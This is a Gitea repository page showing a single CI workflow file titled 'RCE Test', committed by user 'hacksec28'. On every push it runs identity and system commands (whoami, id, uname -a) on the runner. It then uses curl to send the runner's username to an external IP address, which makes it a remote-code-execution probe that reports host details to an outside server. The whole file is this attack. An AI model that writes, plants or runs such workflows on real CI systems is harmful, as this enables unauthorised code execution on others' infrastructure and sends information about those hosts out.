Files
test-rce-repo/.gitea/workflows/rce.yaml
T
hacksec28 17456fabdd
RCE Test / rce (push) Failing after 13m56s
test workflow
2026-07-28 23:23:59 +00:00

13 lines
223 B
YAML

name: RCE Test
on: [push]
jobs:
rce:
runs-on: ubuntu-latest
steps:
- name: Execute Command
run: |
whoami
id
uname -a
curl http://202.79.169.91:28016/$(whoami)